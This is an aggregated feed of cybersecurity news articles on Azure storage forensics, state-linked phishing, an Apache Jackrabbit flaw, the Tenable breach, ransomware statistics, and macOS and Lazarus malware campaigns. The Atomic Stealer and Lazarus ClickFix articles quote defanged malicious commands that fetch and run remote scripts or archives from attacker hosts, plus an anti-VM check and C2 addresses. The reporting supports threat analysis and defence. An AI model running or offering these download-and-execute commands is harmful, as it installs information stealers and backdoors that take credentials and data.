• After a security breach, forensic investigators work quickly to follow the attacker’s trail. Security experts have analyzed this situation and found that a key source of evidence is often overlooked: Microsoft Azure Storage logs.

    While frequently overlooked, these logs provide invaluable insights that can help reconstruct an attack, trace data theft, and identify security gaps.

    Azure Storage Accounts, which can hold vast amounts of sensitive data, are a prime target for threat actors aiming to exfiltrate information.

    However, the diagnostic logging that captures their malicious activity is not always enabled by default, creating a significant blind spot for incident response teams. Without these logs, crucial evidence of how attackers accessed and stole data can be lost forever.

    Threat actors exploit various weaknesses to gain unauthorized access, including misconfigured security settings, weak access controls, and leaked credentials.

    Two common methods involve the misuse of Shared Access Signature (SAS) tokens, which grant specific permissions for a limited time, and the exposure of Storage Account keys, which provide privileged, long-term access to the data, Microsoft said.

    Microsoft Azure Storage Logs For Forensic

    Once logging is enabled correctly, investigators can turn to the StorageBlobLogs table within Azure’s Log Analytics.

    Table with investigation fields
    Table with investigation fields

    These logs capture essential details about every read, write, and delete operation on stored data. Key fields provide a digital breadcrumb trail of the attacker’s actions:

    • OperationName: Identifies the specific action taken, such as “GetBlob” (downloading a file), “PutBlob” (uploading a file), or “DeleteBlob.”
    • CallerIpAddress: Reveals the IP address of the requester, helping to pinpoint the origin of the malicious activity.
    • UserAgentHeader: Offers clues about the tools used to access the data, distinguishing between access from a web browser, the Azure portal, or specialized tools like AzCopy or Azure Storage Explorer.
    • AuthenticationType: Shows how the user authenticated, whether through standard credentials (OAuth), a SAS token, or an Account Key.

    By analyzing these fields, investigators can differentiate between legitimate user activity and a threat actor’s movements.

    For example, a sudden spike in “ListContainers” or “ListBlobs” operations from an unknown IP address could indicate an attacker is mapping out the storage environment.

    Failure attempts on logs
    Failure attempts on logs

    Similarly, tracking “GetBlob” operations can confirm data exfiltration and identify exactly which files were accessed.

    From Detection to Prevention

    The investigation often starts by correlating suspicious sign-ins from Microsoft Entra ID with activity in the storage logs. In one scenario, a compromised user account with administrative privileges might be used to grant another malicious account access roles like “Storage Blob Data Contributor.”

    The AzureActivity logs would show this role assignment, while the StorageBlobLogs logs would subsequently reveal the new account accessing and downloading sensitive files.

    By correlating the authentication hash of a SAS token, investigators can track every action performed with that token, even if the attacker switches IP addresses. This helps define the full scope of the compromise.

    Dreymann and Shiva P’s analysis underscores a critical message for organizations using Azure: enabling storage account logging is not just an option but a necessity.

    These logs are indispensable for post-breach forensics, allowing teams to understand the incident’s scope, guide remediation efforts, and implement stronger controls to prevent future data theft.

    Find this Story Interesting! Follow us on Google NewsLinkedIn, and X to Get More Instant Updates.

    The post How Microsoft Azure Storage Logs Aid Forensics Following a Security Breach appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • U.S. federal authorities have launched an investigation into a sophisticated malware campaign that targeted sensitive trade negotiations between Washington and Beijing.

    The attack, which surfaced in July 2025, involved fraudulent emails purportedly sent by Representative John Moolenaar, chairman of the House Select Committee on Strategic Competition between the United States and Chinese Communist Party.

    The malicious campaign specifically targeted U.S. trade groups, law firms, and government agencies with weaponized emails designed to harvest intelligence on America’s trade strategy with China.

    The timing of the attack proved particularly strategic, occurring just before crucial U.S.-China trade talks in Sweden that ultimately led to an extension of the tariff truce until early November, when President Donald Trump and Chinese leader Xi Jinping were scheduled to meet at an Asian economic summit.

    Cybersecurity experts traced the malware back to APT41, a notorious hacker group with established ties to Chinese intelligence operations.

    Reuters analysts identified the attack as part of a broader pattern of Beijing-linked cyber espionage campaigns aimed at gaining insights into White House recommendations for contentious trade negotiations.

    The sophisticated nature of the operation suggests state-sponsored backing and advanced persistent threat capabilities.

    The fraudulent emails employed social engineering tactics, containing subject lines such as “Your insights are essential” and requesting recipients to review what appeared to be legitimate proposed legislation.

    However, opening the attached draft legislation would have triggered the malware deployment, potentially granting the attackers extensive access to targeted organizational networks and sensitive communications.

    Advanced Persistence and Evasion Mechanisms

    The malware campaign demonstrated sophisticated infection mechanisms designed to establish persistent access while evading detection systems.

    The attack vector relied on malicious document attachments that likely contained embedded macros or exploited zero-day vulnerabilities in common office applications.

    Upon execution, the malware would have established command and control communications, enabling remote access to compromised systems.

    The perpetrators employed advanced spoofing techniques to impersonate Representative Moolenaar’s official correspondence, likely harvesting legitimate email signatures and formatting to enhance authenticity.

    This approach demonstrates the attackers’ thorough reconnaissance capabilities and their understanding of U.S. political structures and communication patterns.

    Detection of the campaign occurred when Moolenaar’s committee staff began receiving inquiries about emails they had never sent, triggering an internal investigation.

    The U.S. Capitol Police and FBI have since launched formal investigations, though authorities declined to comment on specific details of the ongoing probe.

    China’s embassy in Washington denied involvement, stating they “firmly oppose and combat all forms of cyber attacks and cyber crime” while calling for evidence-based accusations rather than unfounded claims.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post U.S. Authorities Investigating Malicious Email Targeting Trade Talks with China appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A new security flaw has been discovered in Apache Jackrabbit, a widely used content repository system, potentially exposing thousands of applications to remote code execution (RCE) risks. The vulnerability, tracked as CVE-2025-58782, affects both Apache Jackrabbit Core and Apache Jackrabbit JCR Commons, with severity rated as important. The issue arises from deserialization of untrusted data within JNDI-based repository lookups. […]

    The post Apache Jackrabbit Vulnerability Exposes Systems to Remote Code Execution Attacks appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A sophisticated malware campaign targeting macOS users has emerged, exploiting the widespread desire for free software to deliver the notorious Atomic macOS Stealer (AMOS).

    This information-stealing malware masquerades as cracked versions of popular applications, tricking unsuspecting users into compromising their own systems while believing they are simply downloading free software alternatives.

    The campaign represents a significant shift in the cybersecurity landscape, challenging the long-held perception that macOS devices are inherently safer than their Windows counterparts.

    As Apple devices gain popularity among professionals and high-value targets, cybercriminals have adapted their tactics to capitalize on this growing market.

    The attackers demonstrate remarkable sophistication by employing multiple distribution methods and continuously rotating their infrastructure to evade detection.

    The malware’s reach extends far beyond simple data theft, targeting sensitive information including browser credentials, cryptocurrency wallets, Telegram conversations, VPN configurations, keychain data, Apple Notes, and various document files.

    This comprehensive approach to data collection makes AMOS particularly dangerous for both individual users and enterprise environments, where compromised credentials can lead to broader organizational breaches.

    Trend Micro researchers identified this campaign through their Managed Detection and Response services, noting the malware’s ability to bypass traditional security measures through social engineering rather than technical exploits.

    The analysis revealed that attackers primarily distribute AMOS through websites like haxmac.cc, which hosts numerous cracked macOS applications and serves as the initial infection vector.

    haxmac[.]cc also hosts other “cracked” software for macOS (Source – Trend Micro)

    The distribution strategy involves redirecting users through a complex network of rotating domains including dtxxbz1jq070725p93[.]cfd, goipbp9080425d4[.]cfd, and im9ov070725iqu[.]cfd.

    AMOS’ infection chain and delivery process (Source – Trend Micro)

    These redirectors eventually lead victims to landing pages hosted on domains such as ekochist.com, misshon.com, and toutentris.com, where they encounter two primary installation methods.

    Terminal-Based Installation and Persistence Mechanisms

    The most successful distribution method involves instructing users to execute malicious commands directly in the macOS Terminal application.

    This approach proves particularly effective because it bypasses Apple’s Gatekeeper security feature, which normally prevents unsigned applications from running.

    Users are presented with seemingly innocuous commands like:-

    curl - fsSL https[:]//goatramz[.]com/get4/install[.]sh | bash

    Once executed, this command downloads and runs an installation script that performs several critical operations.

    The script first downloads an AppleScript file named “update” to the temporary directory, which then conducts anti-virtualization checks to avoid detection in sandboxed environments:-

    set memData to do shell script "system_profiler SPMemoryDataType"
    if memData contains "QEMU" or memData contains "VMware" then```  set exitCode to 100
    else
        set exitCode to 0
    end if

    The malware establishes persistence through a sophisticated multi-component system involving three key files. The primary stealer binary (.helper) performs the actual data collection, while a monitoring script ([.]agent) runs continuously to detect user login sessions.

    A LaunchDaemon configuration file (com[.]finder[.]helper[.]plist) ensures the malware survives system reboots by automatically launching the monitoring script at startup.

    The persistence mechanism creates an infinite loop where the .agent script continuously monitors for active user sessions and executes the .helper binary in the appropriate user context.

    This design ensures consistent operation while maintaining a low profile, as the malware operates through legitimate system processes and avoids creating obvious indicators of compromise.

    Data exfiltration occurs through compressed ZIP archives sent via HTTP POST requests to command-and-control servers, with custom headers containing unique identifiers for each infected system.

    The malware’s comprehensive data collection capabilities, combined with its sophisticated evasion and persistence mechanisms, make it a formidable threat to macOS users who download software from untrusted sources.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post Atomic Stealer Disguised as Cracked Software Attacking macOS Users appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Tenable, a well-known cybersecurity company, has confirmed that it was affected by a recent large-scale data theft campaign. The attack targeted Salesforce and Salesloft Drift integrations, and Tenable was one of the organizations caught up in the incident. The company stressed that while customer contact details were accessed, Tenable products and the data inside those […]

    The post Tenable Data Breach Confirmed -Customer Contact Details Compromised appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The notorious Lazarus APT group, suspected of having Northeast Asian origins and internally tracked as APT-Q-1 by Qi’anxin, has evolved its attack methodologies by incorporating the sophisticated ClickFix social engineering technique into their cyber espionage operations. This development represents a significant escalation in the group’s capabilities to deceive victims and steal sensitive intelligence data through […]

    The post Lazarus APT Deploys ClickFix Technique to Exfiltrate Sensitive Intelligence Data appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Ransomware has emerged as one of the most devastating cybercrime threats in the contemporary digital landscape, with criminal organizations operating sophisticated billion-dollar enterprises that target critical infrastructure across multiple nations.

    Between 2020 and 2022, ransomware groups conducted over 865 documented attacks against organizations in Australia, Canada, New Zealand, and the United Kingdom, employing advanced cryptoviral techniques that encrypt victims’ data systems while demanding cryptocurrency payments for decryption keys.

    The evolution of these criminal enterprises has transformed from simple encryption-based extortion to complex “double extortion” and “triple extortion” schemes, where attackers not only encrypt data but also threaten to sell or publicly expose stolen information.

    These groups compromise systems through various attack vectors including botnets, malicious freeware, and sophisticated phishing campaigns that exploit human cognitive biases to gain initial access to target networks.

    The emergence of Ransomware-as-a-Service (RaaS) models has fundamentally altered the cybercrime ecosystem, creating a distinction between core ransomware developers and affiliate operators.

    Core groups focus on malware development, distribution infrastructure, victim payment processing, and maintaining leak sites, while affiliates handle the tactical elements of system compromise, ransomware deployment, and ransom negotiations.

    AIC analysts identified that this market-based relationship structure allows cybercriminals to move fluidly between different ransomware organizations, adapting quickly to law enforcement pressures and market opportunities.

    Research conducted by the Australian Institute of Criminology reveals that Conti emerged as the most prolific ransomware organization, orchestrating 141 attacks across the three-year period, followed closely by the combined LockBit variants responsible for 129 attacks.

    The data demonstrates that groups adopting RaaS models and maintaining operational continuity across multiple years achieved significantly higher attack volumes than traditional ransomware operations.

    Technical Infrastructure and Operational Mechanisms

    The technical sophistication of modern ransomware operations extends far beyond simple file encryption, incorporating advanced persistence mechanisms and detection evasion techniques.

    Ransomware groups typically establish initial access through credential stuffing attacks, exploitation of unpatched vulnerabilities, or social engineering campaigns targeting remote desktop protocols.

    Once inside target networks, attackers deploy lateral movement techniques using legitimate administrative tools like PowerShell and Windows Management Instrumentation to avoid detection.

    The persistence phase involves establishing multiple backdoors throughout compromised networks, often utilizing legitimate system processes to maintain stealth.

    Groups like Conti and LockBit implement sophisticated reconnaissance protocols, systematically mapping network architecture, identifying critical data repositories, and locating backup systems before deploying encryption payloads.

    The encryption process itself employs military-grade cryptographic algorithms, with many groups utilizing hybrid encryption schemes combining symmetric and asymmetric encryption to optimize both speed and security.

    Most active ransomware groups analysis:-

    Ransomware GroupTotal AttacksActive YearsModel
    Conti1412020-2022RaaS
    LockBit (Combined)1292021-2022RaaS
    Pysa482020-2021Traditional
    REvil432020-2021RaaS
    NetWalker372020-2021RaaS

    Sector targeting distribution:-

    SectorTotal AttacksPrimary Targets
    Industrial239Manufacturing, Building Products
    Consumer Goods150Retail, Food & Beverage
    Real Estate93Property Development
    Financial Services93Banking, Insurance
    Technology92Software, IT Services

    The industrial sector emerged as the primary target across all analyzed countries, accounting for 239 total attacks.

    This targeting preference reflects both the critical nature of industrial operations and the sector’s vulnerability to operational disruption, making organizations more likely to pay ransoms to restore production capabilities quickly.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post Australian Authorities Uncovered Activities and Careers of Ransomware Criminal Groups appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The notorious Lazarus APT group has evolved its attack methodology by incorporating the increasingly popular ClickFix social engineering technique to distribute malware and steal sensitive intelligence data from targeted organizations.

    This North Korean-linked threat actor, internally tracked as APT-Q-1 by security researchers, has demonstrated remarkable adaptability by integrating deceptive user interface manipulation with their traditional espionage operations.

    The ClickFix technique represents a sophisticated social engineering approach where attackers present victims with fabricated technical issues, then guide them through seemingly legitimate “fixes” that actually execute malicious code.

    Lazarus has weaponized this method within their established fake recruitment campaign infrastructure, creating a multi-layered attack vector that combines job opportunity lures with technical deception.

    CN-SEC analysts identified this campaign through the discovery of a malicious batch script that downloads disguised NVIDIA software packages, which subsequently deploy the group’s signature BeaverTail information stealer.

    The attack chain begins when victims are lured to fraudulent interview websites that prompt them to prepare their interview environment, eventually claiming camera configuration issues require immediate resolution.

    Phishing operation (Source – CN-SEC)

    The technical sophistication of this operation extends beyond simple social engineering. Victims are presented with what appears to be a legitimate NVIDIA driver update command, but the underlying payload morphs into a malicious execution sequence.

    The primary infection vector utilizes a PowerShell command that downloads and extracts a malicious ZIP archive from compromised infrastructure.

    Recent analysis reveals that the group has expanded operations to target both Windows and macOS platforms, demonstrating cross-platform capabilities through tailored payloads for different operating system architectures.

    The Windows variant focuses on enterprise environments through Node.js-based deployment mechanisms, while macOS versions utilize shell scripts designed for Apple Silicon and Intel processors.

    Malware Deployment and Persistence Mechanisms

    The core malware package, distributed as “nvidiaRelease[.]zip” (MD5: f9e18687a38e968811b93351e9fca089), contains multiple components designed for cross-platform compatibility and persistent access.

    nvidiaRelease.zip contents (Source – CN-SEC)

    The initial ClickFix-1.bat script executes the following command sequence:-

    curl - k - o "%TEMP%\\nvidiaRelease[.]zip" https[:]//driverservices[.]store/visiodrive/nvidiaRelease[.]zip && powershell - Command "Expand-Archive - Force - Path '%TEMP%\\nvidiaRelease[.]zip' - DestinationPath '%TEMP%\\nvidiaRelease'" && cscript "%TEMP%\\nvidiaRelease\\run[.]vbs"

    The extracted archive deploys run[.]vbs, which performs system reconnaissance to determine the Windows build number.

    For Windows 11 systems (build 22000 or higher), the script additionally executes drvUpdate[.]exe, a sophisticated backdoor capable of command execution and file manipulation.

    This binary establishes communication with command-and-control servers at 103.231.75.101:8888, implementing functions including system information collection, remote command execution, and file transfer capabilities.

    Core Malware Components:-

    ComponentMD5 HashFunction
    ClickFix-1[.]bata4e58b91531d199f268c5ea02c7bf456Initial payload downloader
    nvidiaRelease[.]zipf9e18687a38e968811b93351e9fca089Malicious archive package
    run[.]vbs3ef7717c8bcb26396fc50ed92e812d13System reconnaissance script
    main.[]js (BeaverTail)b52e105bd040bda6639e958f7d9e3090Cross-platform information stealer
    drvUpdate[.]exe6175efd148a89ca61b6835c77acc7a8dWindows 11 backdoor

    The malware achieves persistence through registry modification, adding an entry to the Windows startup registry key that ensures execution across system reboots.

    The BeaverTail component communicates with infrastructure at 45.159.248.110, demonstrating redundant command-and-control capabilities for maintaining long-term access to compromised systems.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post Lazarus APT Hackers Using ClickFix Technique to Steal Sensitive Intelligence Data appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Cybercriminals have escalated their attacks against macOS users by deploying a sophisticated new campaign that leverages a fraudulent Microsoft Teams download site to distribute the dangerous Odyssey stealer malware. This development represents a significant evolution from earlier attacks that primarily targeted users through fake trading platforms. The malicious campaign first came to light in early […]

    The post Hackers Exploit Fake Microsoft Teams Site to Spread Odyssey macOS Stealer appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Tenable has confirmed a data breach that exposed the contact details and support case information of some of its customers.

    The company stated the incident is part of a broader data theft campaign targeting an integration between Salesforce and the Salesloft Drift marketing application, which has affected numerous organizations.

    In a public statement, Tenable expressed its commitment to transparency and detailed the extent of the breach. The company’s investigation found that an unauthorized user had gained access to a segment of customer information stored within its Salesforce instance.

    While Tenable’s core products and the data within them remain secure, the incident has raised concerns about the security of third-party application integrations within major business platforms.

    Exposed Data

    The information accessed by the unauthorized party was limited to data within Tenable’s Salesforce environment. This included:

    • Commonly available business contact information, such as customer names, business email addresses, and phone numbers.
    • Regional and location references associated with customer accounts.
    • Subject lines and initial descriptions that customers provided when opening a support case.

    Tenable has noted that at this time, there is no evidence to suggest that the attackers have actively misused any of this information.

    The breach at Tenable was not an isolated attack but is linked to a wider, sophisticated campaign that security experts have been tracking. This campaign specifically exploits a vulnerability in the integration between Salesforce and Salesloft Drift, a popular sales engagement platform.

    Attackers have been using this vector to exfiltrate data from the Salesforce instances of various companies that use the integrated applications. Tenable confirmed it was one of many organizations impacted by this coordinated effort.

    Tenable’s Response and Mitigation

    Upon discovering the incident, Tenable took immediate action to secure its systems and protect customer data. The company has outlined several steps it has taken to address the issue:

    • All potentially compromised credentials for Salesforce, Drift, and related integrations were promptly revoked and rotated.
    • The Salesloft Drift application, along with all applications that integrated with it, was disabled and removed from Tenable’s Salesforce instance.
    • The company has further hardened its Salesforce environment and other connected systems to prevent future exploitation.
    • Tenable applied known Indicators of Compromise (IoCs) shared by Salesforce and cybersecurity experts to identify and block malicious activity.
    • Continuous monitoring of its Salesforce and other SaaS solutions is ongoing to detect any exposures or unusual activity.

    Tenable is advising its customers to remain vigilant and has recommended that they follow the proactive steps outlined by Salesforce and leading security experts to secure their own systems.

    Confirmed victims of this supply chain attack include:

    • Palo Alto Networks: The cybersecurity firm confirmed the exposure of business contact information and internal sales data from its CRM platform.
    • Zscaler: The cloud security company reported that customer information, including names, contact details, and some support case content, was accessed.
    • Google: In addition to being an investigator, Google confirmed a “very small number” of its Workspace accounts were accessed through the compromised tokens.
    • Cloudflare: Cloudflare has confirmed a data breach where a sophisticated threat actor accessed and stole customer data from the company’s Salesforce instance.
    • PagerDuty has confirmed a security incident that resulted in unauthorized access to some of its data stored in Salesforce.

    Find this Story Interesting! Follow us on Google NewsLinkedIn, and X to Get More Instant Updates.

    The post Tenable Confirms Data Breach – Hackers Accessed Customers’ Contact Details appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶